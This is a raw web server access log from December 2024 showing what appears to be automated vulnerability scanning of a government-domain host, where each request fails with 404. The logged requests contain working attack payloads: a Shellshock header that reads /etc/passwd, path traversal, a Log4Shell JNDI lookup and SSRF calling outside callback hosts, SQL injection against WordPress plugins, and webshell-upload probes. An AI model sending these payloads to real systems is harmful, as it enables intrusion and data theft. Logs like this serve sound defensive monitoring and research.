POST /WS/Basic/Basic.asmx - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 55 2024-12-12 10:01:08 103.153.214.94 GET /tree action=get 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.6.17 - 404 7 0 207 2024-12-12 10:01:49 103.153.214.94 POST /cobbler_api - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 226 2024-12-12 10:02:50 103.153.214.94 POST /api/v1/login/oauth2/auth - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:107.0)+Gecko/20100101+Firefox/107.0 - 404 7 0 228 2024-12-12 10:04:26 103.153.214.94 POST /viewlog.jsp - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+rv:102.0)+Gecko/20100101+Firefox/102.0 - 404 7 0 205 2024-12-12 10:04:28 103.153.214.94 GET /fmangersub cpath=../../../../../../../etc/passwd 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.5+Safari/605.1.15 - 404 7 0 209 2024-12-12 10:04:31 103.153.214.94 POST /controller/origemdb.php idselorigem=ATIVOS 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.1+20.51 - 404 7 0 204 2024-12-12 10:04:33 103.153.214.94 POST /controller/login.php acao=autenticar 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/110.0.0.0+Safari/537.36 - 404 7 0 218 2024-12-12 10:04:34 103.153.214.94 POST /controller/login.php acao=autenticar 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64;+rv:68.0)+Gecko/20100101+Firefox/68.0 - 404 7 0 200 2024-12-12 10:06:42 103.153.214.94 POST /action.php - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 210 2024-12-12 10:06:42 103.153.214.94 POST /delete_cart_goods.php - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 205 2024-12-12 10:07:45 103.153.214.94 GET /index.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11_0_0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/87.0.4280.88+Safari/537.36 - 404 7 0 205 2024-12-12 10:08:54 103.153.214.94 POST /homeaction.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0.1+Safari/605.1.15 - 404 7 0 225 2024-12-12 10:09:21 103.153.214.94 POST /v1/backend1 - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 225 2024-12-12 10:09:25 103.153.214.94 GET /v1/2q6JQRBmBIRNUtVNEDeq5PBHoj0.php - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 222 2024-12-12 10:10:14 103.153.214.94 POST /TransferredOutModal.php modfunc=detail 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:88.0)+Gecko/20100101+Firefox/88.0 - 404 7 0 204 2024-12-12 10:10:14 103.153.214.94 POST /index.php - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 204 2024-12-12 10:11:44 103.153.214.94 POST /sys/ui/extend/varkind/custom.jsp - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 59 2024-12-12 10:11:47 103.153.214.94 POST /_ignition/execute-solution - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 227 2024-12-12 10:11:50 103.153.214.94 POST /_ignition/execute-solution - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 222 2024-12-12 10:11:53 103.153.214.94 POST /_ignition/execute-solution - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:94.0)+Gecko/20100101+Firefox/94.0 - 404 7 0 217 2024-12-12 10:11:56 103.153.214.94 POST /_ignition/execute-solution - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+x86_64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 215 2024-12-12 10:11:59 103.153.214.94 POST /_ignition/execute-solution - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:55.0)+Gecko/20100101+Firefox/55.0 - 404 7 0 200 2024-12-12 10:12:02 103.153.214.94 POST /_ignition/execute-solution - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.5)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.15 - 404 7 0 201 2024-12-12 10:15:05 103.153.214.94 GET /cgi-bin/slogin/login.py - 8172 - 156.251.25.152 ()+{+:;+};+echo+;+echo+;+/bin/cat+/etc/passwd - 404 7 0 208 2024-12-12 10:15:07 103.153.214.94 POST /sitecore/shell/ClientBin/Reporting/Report.ashx - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 233 2024-12-12 10:16:40 103.153.214.94 POST /data/sys-common/treexml.tmpl - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 59 2024-12-12 10:18:38 103.153.214.94 POST /cgi 2 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 http://bcvt.kontum.gov.vn:8172/mainFrame.htm 404 7 0 208 2024-12-12 10:18:41 103.153.214.94 POST /cgi 7 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 http://bcvt.kontum.gov.vn:8172/mainFrame.htm 404 7 0 228 2024-12-12 10:20:49 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 217 2024-12-12 10:21:19 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 58 2024-12-12 10:21:34 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 60 2024-12-12 10:21:36 103.153.214.94 POST /RestAPI/LogonCustomization - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.138+Safari/537.36 - 404 7 0 215 2024-12-12 10:21:40 103.153.214.94 POST /RestAPI/LogonCustomization - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 209 2024-12-12 10:21:43 103.153.214.94 POST /RestAPI/Connection - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 201 2024-12-12 10:21:46 103.153.214.94 GET /help/admin-guide/test.jsp - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 213 2024-12-12 10:22:47 103.153.214.94 POST /Side.php - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/91.0.4472.124+Safari/537.3 - 404 7 0 202 2024-12-12 10:22:49 103.153.214.94 GET /elFinder/php/connector.minimal.php cmd=mkfile&target=l1_Lw&name=2q6JQfyxkoLBN9EXvTghj3W1xw6.php:aaa 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:71.0)+Gecko/20100101+Firefox/71.0 - 404 7 0 205 2024-12-12 10:22:53 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 201 2024-12-12 10:22:55 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 55 2024-12-12 10:23:14 103.153.214.94 GET /client/index.php - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 - 404 7 0 219 2024-12-12 10:23:14 103.153.214.94 GET /STATE_ID/123/agentLogUploader - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14)+AppleWebKit/617.18+(KHTML,+like+Gecko)+Version/17.4+Safari/617.18 - 404 7 0 221 2024-12-12 10:23:19 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 203 2024-12-12 10:23:22 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 222 2024-12-12 10:23:49 103.153.214.94 GET /oh/wopi/files/@/wFileId/contents wFileId=http://ctcj3jjbclslbev4n7q0nabmag3t6r946.oast.live/cjcx.xlsx%3fbody=cjcx%26header=Location:http://oast.pro%26status=302&access_token_ttl=0 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 36 2024-12-12 10:26:12 103.153.214.94 GET /language/lang - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 219 2024-12-12 10:26:22 103.153.214.94 GET /api/blade-user/user-list - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Version/4.0+Chrome/85.0.4183.127+Safari/537.36 - 404 7 0 212 2024-12-12 10:26:22 103.153.214.94 GET /api/blade-user/user-list - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:95.0)+Gecko/20100101+Firefox/95.0 - 404 7 0 220 2024-12-12 10:26:22 103.153.214.94 GET /api/blade-user/user-list - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/15.6.1+Safari/605.1.15 - 404 7 0 229 2024-12-12 10:26:40 103.153.214.94 GET /login.htm - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 204 2024-12-12 10:26:42 103.153.214.94 GET /formLoginAuth.htm authCode=1&userName=admin&goURL&action=login 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 201 2024-12-12 10:27:40 103.153.214.94 POST /mifs/j_spring_security_check - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/94.0.4606.71+Safari/537.36 https://bcvt.kontum.gov.vn:8172/mifs/user/login.jsp 404 7 0 41 2024-12-12 10:27:48 103.153.214.94 POST /classes/Login.php f=login 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 199 2024-12-12 10:27:52 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 209 2024-12-12 10:28:29 103.153.214.94 POST /ddns_check.ccp - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 198 2024-12-12 10:28:49 103.153.214.94 POST /sys/ui/sys_ui_component/sysUiComponent.do - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.3 - 404 7 0 42 2024-12-12 10:29:04 103.153.214.94 POST /resource/help/sys/portal/dataxml.jsp - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.6.27 - 404 7 0 34 2024-12-12 10:32:00 103.153.214.94 POST /index/gettunnel - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 35 2024-12-12 10:33:02 103.153.214.94 GET / x=${jndi:ldap://${:-800}${:-932}.${hostName}.uri.ctd67t3bclspkptm3qo06kn43qtwypu1q.oast.fun/a} 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.1)+AppleWebKit/618.27+(KHTML,+like+Gecko)+Version/17.4+Safari/618.27 - 404 7 0 221 2024-12-12 10:33:29 103.153.214.94 POST /apply.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 236 2024-12-12 10:37:40 103.153.214.94 POST /ocpu/library/base/R/do.call/json - 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 72 2024-12-12 10:39:19 103.153.214.94 GET / rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 212 2024-12-12 10:39:20 103.153.214.94 POST / rest_route=/notificationx/v1/analytics 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 201 2024-12-12 10:42:30 103.153.214.94 GET / rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20md5(999999999),null,null%20--%20g 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 219 2024-12-12 10:42:32 103.153.214.94 GET /user/login - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+12)+AppleWebKit/618.6+(KHTML,+like+Gecko)+Version/17.2+Safari/618.6 - 404 7 0 203 2024-12-12 10:42:44 103.153.214.94 PUT /cgi-bin/AzNsiI.txt - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/110.0 - 404 7 0 200 2024-12-12 10:42:46 103.153.214.94 GET /cgi-bin/AzNsiI.txt - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:50.0)+Gecko/20100101+Firefox/50.0 - 404 7 0 200 2024-12-12 10:42:48 103.153.214.94 POST /tcp.php - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/100.0.4896.127+Safari/537.36 - 404 7 0 61 2024-12-12 10:42:50 103.153.214.94 GET /travel-detail.php id=1%27AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(6)))bAKL)%20AND%20%27vRxe%27=%27vRxe 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 38 2024-12-12 10:43:58 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_13_6)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/79.0.3945.88+Safari/537.36 - 404 7 0 209 2024-12-12 10:43:58 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+x86_64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 218 2024-12-12 10:44:16 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+CrOS+x86_64+14092.77.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/93.0.4577.107+Safari/537.36 - 404 7 0 196 2024-12-12 10:44:31 103.153.214.94 PUT /cgi-bin/nQqiBr.txt - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 209 2024-12-12 10:44:34 103.153.214.94 DELETE /cgi-bin/nQqiBr.txt - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 207 2024-12-12 10:44:50 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 224 2024-12-12 10:45:44 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 210 2024-12-12 10:46:02 103.153.214.94 GET /2q6JQQANnd4Y1y2grbLwI55lKhU.txt - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 216 2024-12-12 10:46:04 103.153.214.94 PUT /2q6JQQANnd4Y1y2grbLwI55lKhU.txt - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+LoiLoNote/8.0.0+Version/17.4.1+Safari/605.1.15 - 404 7 0 240 2024-12-12 10:46:06 103.153.214.94 GET /2q6JQQANnd4Y1y2grbLwI55lKhU.txt - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.15 - 404 7 0 201 2024-12-12 10:46:13 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 201 2024-12-12 10:48:19 103.153.214.94 GET /wp-admin/admin-ajax.php meta_ids=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&action=remove_post_meta_condition 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Tokai/21.1.294403+Version/17.2+Safari/605.1.15 - 404 7 0 213 2024-12-12 10:48:21 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.1)+AppleWebKit/618.27+(KHTML,+like+Gecko)+Version/17.4+Safari/618.27 - 404 7 0 256 2024-12-12 10:48:23 103.153.214.94 GET /archive/download file=file:///etc/passwd 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 206 2024-12-12 10:48:25 103.153.214.94 GET /archive/download file=http://ctd67t3bclspkptm3qo0d4p16ix5g4m5d.oast.fun/ 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 204 2024-12-12 10:48:43 103.153.214.94 POST /plugin/add - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0.1+Safari/605.1.15 - 404 7 0 45 2024-12-12 10:48:59 103.153.214.94 POST /plugin/customMethod - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.13;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 57 2024-12-12 10:49:06 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_6)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/14.1.2+Safari/605.1.15 - 404 7 0 231 2024-12-12 10:49:44 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 220 2024-12-12 10:50:13 103.153.214.94 GET /plug/comment/commentList.asp id=-1%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now(),null,1%20%20frmasterom%20{prefix}user 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14)+AppleWebKit/617.12+(KHTML,+like+Gecko)+Version/17.3+Safari/617.12 - 404 7 0 35 2024-12-12 10:50:34 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 199 2024-12-12 10:53:11 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.4.22 - 404 7 0 39 2024-12-12 10:54:03 103.153.214.94 GET /images/icons_title.gif - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.15 - 404 7 0 211 2024-12-12 10:54:05 103.153.214.94 DELETE /images/icons_title.gif - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 226 2024-12-12 10:54:05 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/100.0.4896.127+Safari/537.36 - 404 7 0 237 2024-12-12 10:54:07 103.153.214.94 GET /images/icons_title.gif - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.7.23 - 404 7 0 204 2024-12-12 10:54:12 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 207 2024-12-12 10:55:11 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 202 2024-12-12 10:55:34 103.153.214.94 GET / cb=17098 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+15_5_7;+es)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0.7+Safari/605.1.15 - 404 7 0 32 2024-12-12 10:55:50 103.153.214.94 GET / cb=17098 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1+Safari/605.6.25 - 404 7 0 48 2024-12-12 10:55:50 103.153.214.94 GET /wp-admin/admin-ajax.php action=get_monthly_timetable&month=1+AND+(SELECT+6881+FROM+(SELECT(SLEEP(6)))iEAn) 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 214 2024-12-12 10:55:53 103.153.214.94 GET /wp-admin/admin-ajax.php action=ajax_get&route_name=get_doctor_details&clinic_id=%7B"id":"1"%7D&props_doctor_id=1,2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 204 2024-12-12 10:57:21 103.153.214.94 GET /index.php rest_route=/xs-donate-form/payment-redirect/3 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.0)+AppleWebKit/616.3+(KHTML,+like+Gecko)+Version/17.5.22+Safari/616.3 - 404 7 0 205 2024-12-12 10:57:42 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 210 2024-12-12 10:57:48 103.153.214.94 GET /wp-content/plugins/infographic-and-list-builder-ilist/assets/js/ilist_custom_admin.js - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 213 2024-12-12 10:57:58 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:82.0)+Gecko/20100101+Firefox/82.0 - 404 7 0 205 2024-12-12 10:58:07 103.153.214.94 POST /fetch_products.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_3)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.1.15 - 404 7 0 39 2024-12-12 10:59:28 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:98.0)+Gecko/20100101+Firefox/98.0 - 404 7 0 214 2024-12-12 11:00:15 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+i686;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 246 2024-12-12 11:00:40 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 200 2024-12-12 11:02:05 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 156.251.25.152 